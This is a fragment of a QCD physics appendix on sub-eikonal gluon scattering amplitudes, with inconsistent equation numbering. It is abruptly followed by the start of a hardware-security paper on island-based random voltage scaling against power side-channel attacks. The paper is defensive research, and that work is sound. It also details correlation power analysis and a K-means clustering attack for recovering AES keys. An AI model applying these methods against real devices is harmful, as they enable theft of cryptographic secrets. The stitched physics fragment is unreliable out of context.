The final result for the transformation of gluon creation operator by eikonal Wilson line operator up to eikonal order is \[\hat{W}(z_{N}^{+},z_{0}^{+})\hat{a}_{h,\lambda}^{\dagger}(p^{+}, \mathbf{y})\hat{W}^{\dagger}(z_{N}^{+},z_{0}^{+}) \tag{114}\] \[= \hat{a}_{c,\lambda}^{\dagger}(p^{+},\mathbf{y})U_{\mathbf{y}}^{ ch}(z_{N}^{+},z_{0}^{+})+\frac{i}{2p^{+}}\int_{z_{0}^{+}}^{z_{N}^{+}}dz^{+} \hat{a}_{c,\lambda}^{\dagger}(p^{+},\mathbf{y})\partial_{\mathbf{y}}^{2}U_{ \mathbf{y}}^{ch^{\prime}}(z_{N}^{+},z^{+})U_{\mathbf{y}}^{h^{\prime}h}(z^{+}, z_{0}^{+})\] \[\qquad\qquad+2\partial_{\mathbf{y}}^{i}\hat{a}_{c,\lambda}^{ \dagger}(p^{+},\mathbf{y})\partial_{\mathbf{y}}^{i}U_{\mathbf{y}}^{ch^{\prime} }(z_{N}^{+},z^{+})U_{\mathbf{y}}^{h^{\prime}h}(z^{+},z_{0}^{+})\] The first term recovers the well-known eikonal transformation and the second terms represents the sub-eikonal correction. Repeating the above analysis for the gluon annihilation operator, one gets \[\hat{W}^{\dagger}(z_{N}^{+},z_{0}^{+})\hat{a}_{h,\lambda}(p^{+}, \mathbf{y})\hat{W}(z_{N}^{+},z_{0}^{+}) \tag{115}\] \[= U_{\mathbf{y}}^{hc}(z_{N}^{+},z_{0}^{+})\hat{a}_{c,\lambda}(p^{+},\mathbf{y})+\frac{i}{2p^{+}}\int_{z_{0}^{+}}^{z_{N}^{+}}dz^{+}U_{\mathbf{y}}^ {hd}(z_{N}^{+},z^{+})\partial_{\mathbf{y}}^{2}U_{\mathbf{y}}^{dc}(z^{+},z_{0}^ {+})\hat{a}_{c,\lambda}(p^{+},\mathbf{y})\] \[\qquad\qquad+2U_{\mathbf{y}}^{hd}(z_{N}^{+},z^{+})\partial_{ \mathbf{y}}^{i}U_{\mathbf{y}}^{dc}(z^{+},z_{0}^{+})\partial_{\mathbf{y}}^{i} \hat{a}_{c,\lambda}(p^{+},\mathbf{y}).\] Using the above transformations, one can calculate the single gluon scattering amplitude, \[\begin{split}&\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p^{ \prime+},{\bf x}^{\prime})\hat{W}(x_{f}^{+},x_{i}^{+})\hat{a}_{c,\lambda}^{ \dagger}(p^{+},{\bf x})|0\rangle\\ =&\frac{1}{2}\Big{[}\langle 0|W^{\dagger}(x_{f}^{+},x_ {i}^{+})\hat{a}_{c^{\prime},\lambda^{\prime}}(p^{\prime+},{\bf x}^{\prime}) \hat{W}(x_{f}^{+},x_{i}^{+})\hat{a}_{c,\lambda}^{\dagger}(p^{+},{\bf x})|0 \rangle\\ &\qquad+\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p^{ \prime+},{\bf x}^{\prime})\hat{W}(x_{f}^{+},x_{i}^{+})\hat{a}_{c,\lambda}^{ \dagger}(p^{+},{\bf x})W^{\dagger}(x_{f}^{+},x_{i}^{+})|0\rangle\Big{]}\\ =&(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta_{ \lambda\lambda^{\prime}}\Big{\{}\delta({\bf x}-{\bf x}^{\prime})U_{\bf x}^{c^{ \prime}c}(x_{f}^{+},x_{i}^{+})\\ &+\frac{1}{2}\frac{i}{2p^{+}}\int_{x_{i}^{+}}^{x_{f}^{+}}dz^{+} \Big{[}U_{{\bf x}^{\prime}}^{c^{\prime}d}(x_{f}^{+},z^{+})\partial_{{\bf x}^{ \prime}}^{2}U_{{\bf x}^{\prime}}^{dc}(z^{+},z_{i}^{+})\delta({\bf x}-{\bf x}^ {\prime})+2U_{{\bf x}^{\prime}}^{c^{\prime}d}(x_{f}^{+},z^{+})\partial_{{\bf x }^{\prime}}^{i}U_{{\bf x}^{\prime}}^{dc}(z^{+},x_{i}^{+})\partial_{{\bf x}^{ \prime}}^{i}\delta({\bf x}-{\bf x}^{\prime})\Big{]}\\ &+\frac{1}{2}\frac{i}{2p^{+}}\int_{x_{i}^{+}}^{x_{f}^{+}}dz^{+} \Big{[}\delta({\bf x}^{\prime}-{\bf x})\partial_{{\bf x}}^{2}U_{{\bf x}}^{cd}( x_{f}^{+},z^{+})U_{{\bf x}}^{dc}(z^{+},x_{i}^{+})+2\partial_{{\bf x}}^{i} \delta({\bf x}^{\prime}-{\bf x})\partial_{{\bf x}}^{i}U_{{\bf x}}^{c^{\prime}d }(x_{f}^{+},z^{+})U_{{\bf x}}^{dc}(z^{+},x_{i}^{+})\Big{]}\Big{\}}\\ =&(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta_{ \lambda\lambda^{\prime}}\Big{\{}\delta({\bf x}-{\bf x}^{\prime})U_{\bf x}^{c^ {\prime}c}(x_{f}^{+},x_{i}^{+})\\ &-\frac{i}{2p^{+}}\int_{x_{i}^{+}}^{x_{f}^{+}}dz^{+}U_{{\bf x}^{ \prime}}^{c^{\prime}d}(x_{f}^{+},z^{+})\int_{{\bf z}}\big{[}\partial_{{\bf z} }^{i}\delta({\bf x}^{\prime}-{\bf z})\partial_{{\bf 
z}}^{i}\delta({\bf x}-{ \bf z})\big{]}\,U_{{\bf x}}^{dc}(z^{+},x_{i}^{+})\\ &-\frac{i}{2p^{+}}(x_{f}^{+}-x_{i}^{+})\frac{1}{2}\left[\partial_ {{\bf x}^{\prime}}^{2}\delta({\bf x}-{\bf x}^{\prime})U_{{\bf x}^{\prime}}^{c ^{\prime}c}(x_{f}^{+},x_{i}^{+})+\partial_{{\bf x}}^{2}\delta({\bf x}^{\prime }-{\bf x})U_{{\bf x}}^{c^{\prime}c}(x_{f}^{+},x_{i}^{+})\right]\Big{\}}.\end{split} \tag{14}\] In obtaining the last equality, we have repeatedly utilized integration by parts to move the partial derivatives to act on the Dirac delta functions instead of the Wilson lines. For the two terms at sub-eikonal order, the first term recovers the corresponding non local terms in the single gluon scattering amplitude in eq. (3.16) when setting the background field \(a^{i}=0,\psi_{B}=0\). The second term is a boundary term (boundary in the longitudinal direction, not the transverse direction) which is proportional to the width of the shockwave \(x_{f}^{+}-x_{i}^{+}\). It is precisely the phase factor from the free propagator given in Eq. (3.10). If one turns off the background fields \(a^{-}=0\), These two terms vanish as expected \[-\frac{i}{2p^{+}}(x_{F}^{+}-x_{I}^{+})\frac{1}{2}\delta^{c^{\prime}c}\int_{{ \bf z}}\partial_{{\bf z}}^{2}\left[\delta({\bf x}^{\prime}-{\bf z})\delta({\bf x }-{\bf z})\right]=0. \tag{15}\] We would like to calculate the contributions of sub-eikonal Taylor expansion of \(a_{b}^{-}J_{b}^{+}\) to the single particle scattering amplitude. The two sub-eikonal terms arer \[\int d^{2}{\bf z}dz^{+}dz^{-}\Big{[}z^{-}\partial_{-}a_{b}^{-}(z^{+},0,{\bf z} )J_{b}^{+}(0,z^{-},{\bf z})+z^{+}a_{b}^{-}(z^{+},0,{\bf z})\partial_{+}J_{b}^ {+}(0,z^{-},{\bf z})\Big{]} \tag{16}\] For the second term. The time dependence \(z^{+}\partial_{+}J^{+}(0,z^{-},{\bf z})\) is introduced by the lowest order expansion of \(e^{iH_{0}z^{+}}J_{b}^{+}(0,z^{-},{\bf z})e^{-iH_{0}z^{+}}\). In general the time dependence is generated by the full Hamiltonian \(e^{iHz^{+}}J_{b}^{+}(0,z^{-},{\bf z})e^{-iHz^{+}}\). In the case when \(H=H_{0}\), it is part of the sub-eikonal transformation that has already been included in obtaining eq. (14). One should not double count its contribution. For the first term, we utilized the gluonic part to demonstrate the derivations. The gluons' contribution to the time dependent color current is \[J_{0}^{+}(z^{+},z^{-},\mathbf{z})= gf^{bcd}\int_{p^{+},q^{+}}e^{i(p^{-}-q^{-})z^{+}}e^{i(p^{+}-q^{+})z^{-}} \hat{a}^{\dagger}_{c,\lambda}(p^{+},\mathbf{z})\hat{a}_{d,\lambda}(q^{+}, \mathbf{z})(-iq^{+}) \tag{111}\] \[+e^{-i(p^{-}-q^{-})z^{+}}e^{-i(p^{+}-q^{+})z^{-}}\hat{a}^{\dagger} _{d,\lambda}(q^{+},\mathbf{z})\hat{a}_{c,\lambda}(p^{+},\mathbf{z})(iq^{+}).\] Terms containing \(\hat{a}\hat{a}\) and \(\hat{a}^{\dagger}\hat{a}^{\dagger}\) will not contribute to single gluon scattering amplitude and we ignore them. The first term in eq. (110) contains \[\int dz^{-}z^{-}J_{b}^{+}(0,z^{-},\mathbf{z})=-gf^{bcd}\frac{1}{2}\int_{p^{+} }\Big{[}\hat{a}^{\dagger}_{c,\lambda}(p^{+},\mathbf{z})(\overrightarrow{ \partial_{p^{+}}}-\overleftarrow{\partial_{p^{+}}})\hat{a}_{d,\lambda}(p^{+},\mathbf{z})\Big{]}. \tag{112}\] Using this explicit expression, we now compute its contribution to the single gluon scattering amplitude at sub-eikonal order. 
\[= -gf^{bcd}\frac{1}{2}\int dz^{+}f_{b}^{+-}(z^{+},0,\mathbf{z})\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p^{\prime+},\mathbf{x}^{\prime})\hat{W}(x_{f}^{+},z^{+}) \tag{113}\] \[\times\int_{q^{+}}\Big{[}\hat{a}^{\dagger}_{c,\kappa}(q^{+},\mathbf{z})(\overrightarrow{\partial_{q^{+}}}-\overleftarrow{\partial_{q^{+}}})\hat{a}_{d,\kappa}(q^{+},\mathbf{z})\Big{]}\hat{W}(z^{+},x_{i}^{+})\hat{a}^{\dagger}_{c,\lambda}(p^{+},\mathbf{x})|0\rangle\] \[= ig\delta_{\lambda\lambda^{\prime}}\delta(\mathbf{x}-\mathbf{x}^{\prime})\Big{[}(2\pi)(p^{+}+p^{\prime+})\partial_{p^{+}}\delta(p^{\prime+}-p^{+})\Big{]}\int dz^{+}\left[U_{\mathbf{x}}(x_{f}^{+},z^{+})f^{+-}(z^{+},0,\mathbf{x})U_{\mathbf{x}}(z^{+},x_{i}^{+})\right]^{c^{\prime}c}.\] It is apparent that this sub-eikonal interaction involves longitudinal momentum exchange between the projectile and the shockwave. The transverse coordinates, as well as the polarization, are preserved. The polarized Wilson line has an insertion of the longitudinal chromoelectric field \(f^{+-}=\partial_{-}a^{-}\). When calculating spin-related observables at small \(x\), they are represented as interference terms between the eikonal-order amplitude and the sub-eikonal-order amplitude. The eikonal-order amplitudes preserve longitudinal momentum conservation and therefore do not interfere with sub-eikonal interactions that involve longitudinal momentum exchange with the shockwave.
2306.04859
Island-based Random Dynamic Voltage Scaling vs ML-Enhanced Power Side-Channel Attacks
In this paper, we describe and analyze an island-based random dynamic voltage scaling (iRDVS) approach to thwart power side-channel attacks. We first analyze the impact of the number of independent voltage islands on the resulting signal-to-noise ratio and trace misalignment. As part of our analysis of misalignment, we propose a novel unsupervised machine learning (ML) based attack that is effective on systems with three or fewer independent voltages. Our results show that iRDVS with four voltage islands, however, cannot be broken with 200k encryption traces, suggesting that iRDVS can be effective. We finish the talk by describing an iRDVS test chip in a 12nm FinFet process that incorporates three variants of an AES-256 accelerator, all originating from the same RTL. This included a synchronous core, an asynchronous core with no protection, and a core employing the iRDVS technique using asynchronous logic. Lab measurements from the chips indicated that both unprotected variants failed the test vector leakage assessment (TVLA) security metric test, while the iRDVS was proven secure in a variety of configurations.
Dake Chen, Christine Goins, Maxwell Waugaman, Georgios D. Dimou, Peter A. Beerel
2023-06-08T01:12:19Z
http://arxiv.org/abs/2306.04859v2
# Island-based Random Dynamic Voltage Scaling vs ML-Enhanced Power Side-Channel Attacks ###### Abstract. In this paper, we describe and analyze an island-based random dynamic voltage scaling (iRDVS) approach to thwart power side-channel attacks. We first analyze the impact of the number of independent voltage islands on the resulting signal-to-noise ratio and trace misalignment. As part of our analysis of misalignment, we propose a novel unsupervised machine learning (ML) based attack that is effective on systems with three or fewer independent voltages. Our results show that iRDVS with four voltage islands, however, cannot be broken with 200k encryption traces, suggesting that iRDVS can be effective. We finish the talk by describing an iRDVS test chip in a 12nm FinFET process that incorporates three variants of an AES-256 accelerator, all originating from the same RTL. This included a synchronous core, an asynchronous core with no protection, and a core employing the iRDVS technique using asynchronous logic. Lab measurements from the chips indicated that both unprotected variants failed the test vector leakage assessment (TVLA) security metric test, while the iRDVS was proven secure in a variety of configurations. Hardware security; Side-channel attack; Machine learning
Section 3 presents the iRDVS design. Section 4 and Section 5 analyze the SNR and misalignment characteristics of our approach as a function of the number of islands, and Section 6 focuses on our proposed ML attack.
Section 7 and Section 8 describe the details of our simulation experiments and measurement results. Finally, we provide a summary of this work with our plans for future work in Section 9.

## 2. Background

This section summarizes correlation-based power analysis, provides details on the elastic alignment technique used to test our approach, and introduces three common metrics for quantifying countermeasure effectiveness.

### Correlation-Based Power Analysis

Power analysis attacks take advantage of the dependence of a circuit's power consumption on the data it processes. A common method of disclosing this correlation employs a differential technique introduced by Kocher et al. (Kocher et al., 2011) called _differential power analysis_ (_DPA_) that recovers keys bit-by-bit. Another powerful technique requiring less knowledge of the algorithm implementation, introduced by Brier et al., is _correlation-based power analysis_ (_CPA_) (Brier et al., 2016). Brier et al. demonstrated that all countermeasures against CPA provide similar defensive effectiveness against DPA. Moreover, CPA is capable of attacking several bits at a time instead of only a single bit. Because of this advantage, we applied CPA in our experiments.

### Elastic Alignment

Woudenberg et al. (Woudenberg et al., 2011) propose a powerful alignment algorithm, _elastic alignment_, to preprocess traces corrupted by random delay insertion or an unstable clock. The two-step procedure aligns recorded traces to a single reference. First, it leverages a traditional algorithm, _dynamic time warping_, to find a _warp path_ that maps the time steps of each sample trace to those of a reference trace. To do this, the algorithm computes the Euclidean difference between each target trace \(t\) and a reference trace \(r\), captured in a 2-D cost matrix of size \(P\times Q\), where \(P\) and \(Q\) are the lengths of traces \(t\) and \(r\), respectively. It then applies dynamic programming to identify the minimum-cost path through the matrix between points \((0,0)\) and \((P,Q)\). This path defines the correspondence between traces \(r\) and \(t\). Second, guided by this path, elastic alignment averages across samples when multiple samples of \(t\) map to one time step and duplicates samples of \(t\) when one sample of \(t\) maps to multiple time steps. We reproduce this approach and show that it can effectively align traces corrupted by frequency-scaling techniques.

### Metrics for Countermeasure Effectiveness

There are three common metrics for measuring side-channel countermeasure effectiveness. The first is _Minimum Traces to Disclosure (MTD)_, which is the number of encryption/decryption traces required to disclose all of the secret information. A higher MTD indicates a more secure countermeasure. This metric requires that all bytes of the secret are guessed correctly. _Partial Guessing Entropy (PGE)_ (Brier et al., 2016) can be a more practical evaluation metric than MTD because it does not require a correctly-guessed secret. PGE is computed from the ranking of possible values of the subkey bytes in descending order of correlation as estimated by the Pearson correlation coefficient. PGE is the rank of the correct subkey, where a PGE of 0 denotes that the subkey was correctly guessed. A large PGE indicates a low correlation of the correct subkey and consequently a system robust to attacks. The _Test Vector Leakage Assessment (TVLA)_ is also commonly used to evaluate side-channel leakage (Brier et al., 2016).
The test conducts two experiments, one with a fixed plaintext and one with random plaintexts, generating a large number of traces for each; the power samples from the two groups are then used to calculate a t-score at each time step. The t-score is a statistical measure of how different traces from the fixed and random encryptions are from one another. A higher t-score indicates that the difference between the fixed and random traces is less likely to have occurred by chance, suggesting the device exhibits higher leakage that would make a power analysis attack more likely to succeed.

## 3. Island-Based Random DVS

Traditional DVS countermeasures can be attacked if the random dynamic voltage is uncovered (Brier et al., 2016). Attackers can scale measured power traces in time and amplitude to match a reference trace, which renders DVS designs vulnerable. To circumvent the weaknesses of single-island DVS, this paper proposes using several independent voltages in an _island-based random DVS (iRDVS)_ framework, illustrated in Figure 1. iRDVS makes side-channel attacks more difficult because attackers must differentiate between multiple simultaneous random dynamic voltages. One practical means of implementing this iRDVS framework for a pipelined design is to partition each combinational stage into multiple islands with independent voltages. The voltages can be randomly adjusted with the constraint that the delay of each pipeline stage is roughly the same, thereby maximizing overlapping computation and minimizing the chance of introducing timing side channels. Multiple islands can share one voltage supply to support scaling this approach to large circuits with many islands. The islands need not all be the same size but can be adjusted based on both logical and physical constraints, and they communicate using asynchronous channels that implement the flow-control necessary to cope with different stage delays (Brandt et al., 2017).

Figure 1. Illustration of a typical iRDVS structure with \(n=9\) islands and \(m=3\) independent voltages. Each independent voltage domain has a different color and each cloud represents a group of logic; the shaded logic is under attack.

We assume each island will have an on-chip DC/DC converter whose control will leverage the entropy from an off-the-shelf true random number generator (TRNG). This is similar to the random voltage generation proposed for random DVS (Krause et al., 2017; Krause et al., 2018). As was implemented in (Krause et al., 2017), we assume the TRNGs will be on-die and thus not directly accessible to power attacks. Determining the optimal number and configuration of independent voltages that not only thwarts voltage prediction but also retains the statistical merits of DVS is one of the key research objectives we explore here.

## 4. SNR Analysis

The _signal-to-noise ratio (SNR)_ is typically used to quantify how well the secret portion of the computation is hidden within the overall power consumption (Krause et al., 2018). The SNR is defined as \(SNR=\frac{Var(AP)}{Var(N)}\), where \(AP\) denotes the power consumption associated with the intermediate value that carries secret information and \(N\) consists of the power consumption of uncorrelated computations and electronic noise. In this section, we examine the SNR of various island configurations to analyze their effectiveness. To simplify our analysis, we assume the traces are perfectly aligned; we analyze the misalignment benefit associated with iRDVS in the next section.
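As background for the correlation analysis below, the following sketch shows how a CPA adversary estimates the correlation between a hypothetical intermediate value and measured traces in practice. It is an illustrative outline rather than the in-house tool used in our experiments; the `SBOX` table and the trace arrays are assumed inputs.

```python
import numpy as np

def cpa_rank_subkey(traces, plaintext_byte, SBOX):
    """Rank all 256 candidate subkey bytes by their peak Pearson correlation.

    traces:         (num_traces, num_samples) array of power measurements
    plaintext_byte: (num_traces,) array holding one plaintext byte per trace
    """
    num_traces, _ = traces.shape
    centered = (traces - traces.mean(axis=0)) / traces.std(axis=0)
    peak_corr = np.zeros(256)
    for guess in range(256):
        # Hypothetical leakage: Hamming weight of the first-round S-box output
        hypo = np.array([bin(SBOX[p ^ guess]).count("1") for p in plaintext_byte])
        h = (hypo - hypo.mean()) / hypo.std()
        corr = (h @ centered) / num_traces          # correlation per time sample
        peak_corr[guess] = np.max(np.abs(corr))
    return np.argsort(-peak_corr)                   # most to least likely subkey
```

Under this formulation, the PGE from Section 2.3 is simply the position of the correct subkey in the returned ranking.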
The correlation between the hypothetical intermediate value and power traces can be derived in terms of SNR: \[\rho=\frac{\rho_{ap}}{\sqrt{1+\frac{1}{SNR}}} \tag{1}\] where \(\rho_{ap}\) denotes the correlation between the power consumption of the attacked part and the hypothetical intermediate value (Krause et al., 2018). This equation shows that a lower SNR leads to a lower correlation, which indicates higher robustness. Let \(T_{i}\) be a power trace for island \(i\) normalized by the voltage of that island. Let \(v_{i}\) denote the independent random dynamic supply voltage for island \(i\). Because the switching power is proportional to \(v^{\alpha}\), where \(\alpha\approx 2\), and most instantaneous power consumption is from switching power, the DVS power traces are proportional to \(v^{\alpha}T\). Let \(n\) denote the number of independent islands and \(m\) represent the number of independent voltages used. We present three different cases for comparison: first, the \(m=n\) independent DVS case, which means we assign a different random voltage to each island; then, the cases with two (\(m=2\)) and one (\(m=1\)) independent voltages. Without loss of generality, assume the first island is attacked, so the power consumption of the other \(n-1\) islands is switching noise. The SNR for \(m=n\) iRDVS islands (\(v_{1}\), \(v_{2}\), \(\ldots\), \(v_{n}\)) can be represented as follows. Let \(\sigma\) and \(\mu\) denote the standard deviation and mean of their associated variables, respectively. Since \(v_{i}\) and \(T_{i}\) are independent of each other, we can expand the variance for both the numerator and the denominator. \[SNR_{m=n}=\frac{Var(v_{1}^{\alpha}T_{1})}{Var(\sum_{i=2}^{n}v_{i}^{\alpha}T_{i})} \tag{2}\] \[=\frac{\sigma_{v_{1}^{\alpha}}^{2}\sigma_{T_{1}}^{2}+\sigma_{v_{1}^{\alpha}}^{2}\mu_{T_{1}}^{2}+\mu_{v_{1}^{\alpha}}^{2}\sigma_{T_{1}}^{2}}{\sum_{i=2}^{n}(\sigma_{v_{i}^{\alpha}}^{2}\sigma_{T_{i}}^{2}+\sigma_{v_{i}^{\alpha}}^{2}\mu_{T_{i}}^{2}+\mu_{v_{i}^{\alpha}}^{2}\sigma_{T_{i}}^{2})} \tag{3}\] Considering the special case where the variances and means of the island power consumption and supply voltages are the same, denoted \(\sigma_{T}^{2}\), \(\mu_{T}\), \(\sigma_{v^{\alpha}}^{2}\) and \(\mu_{v^{\alpha}}\), we obtain: \[SNR_{m=n}=\frac{\sigma_{v^{\alpha}}^{2}\sigma_{T}^{2}+\sigma_{v^{\alpha}}^{2}\mu_{T}^{2}+\mu_{v^{\alpha}}^{2}\sigma_{T}^{2}}{(n-1)\sigma_{v^{\alpha}}^{2}\mu_{T}^{2}+(n-1)(\mu_{v^{\alpha}}^{2}\sigma_{T}^{2}+\sigma_{v^{\alpha}}^{2}\sigma_{T}^{2})} \tag{4}\] Similarly, we can derive the SNR for the cases where \(m\) is equal to two (\(v_{1}\), \(v_{2}\)) and one (\(v\)) independent voltages, the latter modeling the conventional DVS approach.
\[SNR_{m=2}=\frac{Var(v_{1}^{\alpha}T_{1})}{Var(v_{1}^{\alpha}\sum_{i=2}^{n/2}T_{i}+v_{2}^{\alpha}\sum_{i=n/2+1}^{n}T_{i})}\] \[=\frac{\sigma_{v^{\alpha}}^{2}\sigma_{T}^{2}+\sigma_{v^{\alpha}}^{2}\mu_{T}^{2}+\mu_{v^{\alpha}}^{2}\sigma_{T}^{2}}{[(\frac{n}{2}-1)^{2}+(\frac{n}{2})^{2}]\sigma_{v^{\alpha}}^{2}\mu_{T}^{2}+(n-1)(\sigma_{v^{\alpha}}^{2}\sigma_{T}^{2}+\mu_{v^{\alpha}}^{2}\sigma_{T}^{2})} \tag{5}\] \[SNR_{m=1}=\frac{Var(v_{1}^{\alpha}T_{1})}{Var(v_{1}^{\alpha}\sum_{i=2}^{n}T_{i})}\] \[=\frac{\sigma_{v^{\alpha}}^{2}\sigma_{T}^{2}+\sigma_{v^{\alpha}}^{2}\mu_{T}^{2}+\mu_{v^{\alpha}}^{2}\sigma_{T}^{2}}{(n-1)^{2}\sigma_{v^{\alpha}}^{2}\mu_{T}^{2}+(n-1)(\sigma_{v^{\alpha}}^{2}\sigma_{T}^{2}+\mu_{v^{\alpha}}^{2}\sigma_{T}^{2})} \tag{6}\] Due to the algebraic property that for \(a\geq 1\) and \(b\geq 1\), \((a+b)^{2}\geq a+b\), it can easily be shown that \(SNR_{m=n}\geq SNR_{m=2}\geq SNR_{m=1}\). This indicates that, somewhat counter-intuitively, without considering the misalignment and temporal advantage, a _lower_ number of independent DVS voltages results in lower SNR, and thereby lower correlation and higher robustness. We can explain this trend more generally from the perspective of covariance: \[Var(v_{i}^{\alpha}T_{i}+v_{j}^{\alpha}T_{j})=Var(v_{i}^{\alpha}T_{i})+Var(v_{j}^{\alpha}T_{j})+2Cov(v_{i}^{\alpha}T_{i},v_{j}^{\alpha}T_{j}) \tag{7}\] The above equation is the general formula for computing the variance of two islands. If the two islands have the same supply voltage, i.e., \(v_{i}=v_{j}\), the two quantities \(v_{i}^{\alpha}T_{i}\) and \(v_{j}^{\alpha}T_{j}\) are correlated, and therefore the covariance term \(Cov(v_{i}^{\alpha}T_{i},v_{j}^{\alpha}T_{j})\) is greater than zero. When the two islands have independent random voltages with possibly different means and variances, i.e., \(v_{i}\neq v_{j}\) where \(\sigma_{T}^{2}\), \(\mu_{T}\), \(\sigma_{v^{\alpha}}^{2}\) and \(\mu_{v^{\alpha}}\) are not equal, the two quantities \(v_{i}^{\alpha}T_{i}\) and \(v_{j}^{\alpha}T_{j}\) are also independent and \(Cov(v_{i}^{\alpha}T_{i},v_{j}^{\alpha}T_{j})=0\). This reduction in variance caused by an increasing number of supply voltages can be generalized to more islands. For the case of \(m=2\), the \(\frac{n}{2}\) noise islands supplied by \(v_{2}\) are correlated with one another, increasing the covariance terms in the denominator and decreasing the SNR. However, if we keep \(n\) constant and increase the number of voltage supplies \(m\), the correlation between islands reduces (increasing SNR) because fewer islands are correlated with each other. When \(m=n\), each island is powered by an independent supply, so there is no covariance among noise islands. Therefore, the variance of the noise is minimized and the SNR is maximized for this \(n\). We experimentally verified this trend by performing CPA on a simplified model of AES that simulated the Sbox operations in the first round of AES. This model, given a plaintext, computes the 16 Sbox output values for the first round of AES and generates a power pulse with a peak amplitude corresponding to the sum of their Hamming weights and a fixed width. The results show that the peak correlations of the single-island and two-island cases are close, and as the number of independent voltages increases, the correlation also increases.
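A minimal reconstruction of this verification model is sketched below; the pulse width, noise level, and voltage set are illustrative assumptions, and `SBOX` and `rng` (a NumPy random generator) are assumed to be defined elsewhere.

```python
import numpy as np

def synthetic_trace(plaintext, key, island_voltages, alpha=2.0,
                    pulse_width=20, samples=200, noise_sd=0.5):
    """One synthetic power trace: island 0 leaks the Hamming weight of the 16
    first-round S-box outputs, while the remaining islands contribute
    secret-independent switching activity; amplitudes scale as v**alpha."""
    hw = sum(bin(SBOX[p ^ k]).count("1") for p, k in zip(plaintext, key))
    trace = rng.normal(0.0, noise_sd, samples)                  # electronic noise
    start = samples // 2
    trace[start:start + pulse_width] += (island_voltages[0] ** alpha) * hw
    for v in island_voltages[1:]:                               # noise islands
        trace[start:start + pulse_width] += (v ** alpha) * rng.uniform(40, 80)
    return trace
```

Sweeping the number of distinct values in `island_voltages` (i.e., the number of independent supplies \(m\)) and re-running `cpa_rank_subkey` on the resulting traces offers a simple way to probe the qualitative trend described above.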
However, the correlation for a small number of independent voltages (between 2 and 8) remains well below that observed without dynamic voltage scaling. ## 5. Alignment Analysis iRDVS and DVS introduce temporal advantages for attack resistance in addition to improving SNR by amplitude scaling. According to the Sakurai-Newton delay model (Sakurai and Newton, 1958; Newton, 1958), \(\tau=\frac{C_{L}V}{F(V-V_{T})^{\alpha}}\), the delay of the gates is closely related to the voltage supply. Assuming each independent voltage can change much faster than the duration of an attack, the power samples of the secret component will be shifted in time as the voltage changes. This means that the power samples associated with the secret operation, which were expected to be aligned, may be spread over a large range. The work in (Kumar et al., 2017) presents a relationship between misalignment and the correlation coefficient: \[\rho(H,v^{\alpha}T)=\rho(H,v^{\alpha}_{s}T_{s})*p*\sqrt{\frac{Var(v^{\alpha}_{s }T_{s})}{Var(v^{\alpha}T)}} \tag{8}\] where \(H\) represents the Hamming weight or Hamming distance matrix of the hypothetical intermediate value, \(v^{\alpha}T\) denotes the power consumption at a certain time, \(v^{\alpha}_{s}T_{s}\) refers to the portion of the power consumption caused by the secret operation, and \(p\) denotes the probability that the secret operation is consuming power at the attack time. Thus, \(\rho(H,v^{\alpha}_{s}T_{s})\) is the correlation for the case where the secret samples are perfectly aligned, whereas \(\rho(H,v^{\alpha}T)\) is the correlation for the full design with misalignment. Having one or more dynamic voltages would lead to a small \(p\) by reducing the probability that secret power samples are self-aligned. iRDVS and DVS reduce \(p\) and decrease the correlation coefficient, making CPA attacks more difficult. ## 6. Clustering Attack Many alignment techniques, including elastic alignment (Kumar et al., 2017), are based on a notion of a distance between traces. Power traces from similar operations can be aligned by minimizing the distance between them. Because voltage scaling increases the distance between operations, and multiple supplies add random noise, these techniques are ineffective when applied to our iRDVS approach, as we will show in Section 7. We propose to strengthen alignment attacks using a novel unsupervised ML-based algorithm that clusters the iRDVS traces into several groups that share similar voltage characteristics. After this clustering, we perform a CPA attack on every cluster and rank the possible subkeys based on their derived correlation coefficients, then average the rank of each possible subkey across all clusters and reorder the subkeys based on the average rank. This new rank order combines the information obtained from all individual attacks on all clusters. We pick the subkey with the lowest average rank to determine MTD, and determine PGE by the final rank of the correct subkey. We propose using the computationally efficient K-means clustering algorithm (Kumar et al., 2017) to group similar traces. This approach heuristically minimizes the distances among the power values of traces in each cluster. A critical parameter for K-means clustering is the number of clusters, which is generally set before the start of the clustering algorithm. We hypothesize that the number of clusters should match the number of different voltage combinations used in the trace set. 
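A compact sketch of this attack flow is given below; it uses scikit-learn's KMeans and the hypothetical `cpa_rank_subkey` helper sketched earlier, and is an illustrative outline rather than our exact implementation.

```python
import numpy as np
from sklearn.cluster import KMeans

def clustering_attack(traces, plaintext_byte, SBOX, n_clusters):
    """Cluster traces by their voltage profile, run CPA within each cluster,
    and combine the per-cluster subkey rankings by averaging ranks."""
    labels = KMeans(n_clusters=n_clusters, n_init=10).fit_predict(traces)
    rank_sum = np.zeros(256)
    for c in range(n_clusters):
        idx = labels == c
        ranking = cpa_rank_subkey(traces[idx], plaintext_byte[idx], SBOX)
        ranks = np.empty(256)
        ranks[ranking] = np.arange(256)   # rank of each candidate in this cluster
        rank_sum += ranks
    return np.argsort(rank_sum)           # subkeys ordered by average rank
```

The first entry of the returned ordering is the attack's best guess, and the position of the true subkey in it gives the PGE.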
In this way, each cluster will ideally contain traces from the same specific combination of voltages, ensuring the individual power samples containing the secret key are aligned. Note that having many clusters implies that the average number of traces in each cluster will be \(K\) times smaller, reducing the effectiveness of the individual CPA analysis on each cluster. This motivates the experimental analysis, presented in the next section, of a range of \(K\) values to find the optimal number of clusters. Interesting future work includes using machine learning to guide the choice of \(K\).

## 7. Simulation Results and Analysis

This section describes how we evaluated the effectiveness of our iRDVS approach against alignment and CPA attacks.

### Trace Generation and Experiment Design

We developed an in-house tool in Python to preprocess traces and perform CPA. Our tool converts power traces from various sources into a standard format, voltage scales the traces, and combines scaled traces to form synthetic iRDVS traces. It also performs CPA and clustering attacks on both the original and synthetic traces, and generates correlation coefficient, PGE, TVLA, and MTD metrics. The original traces used for scaling and combining in these experiments are open-source traces from a combinational 128-bit AES implemented and measured on the Sasebo-GII board by Northeastern University (Naras et al., 2017). We make each trace the power consumption of one voltage island. We use the Sakurai-Newton delay model (Sakurai and Newton, 1958) with \(\alpha=2\) to expand each sample in the original trace by interpolation, where \(V_{dd}\) for each island is randomly picked from the set \(\{0.6,0.7,0.8,0.9,1\}\). We then add the scaled traces together to form the synthetic traces of our iRDVS design. This sum approximates a pipelined implementation of AES where each round operates simultaneously. 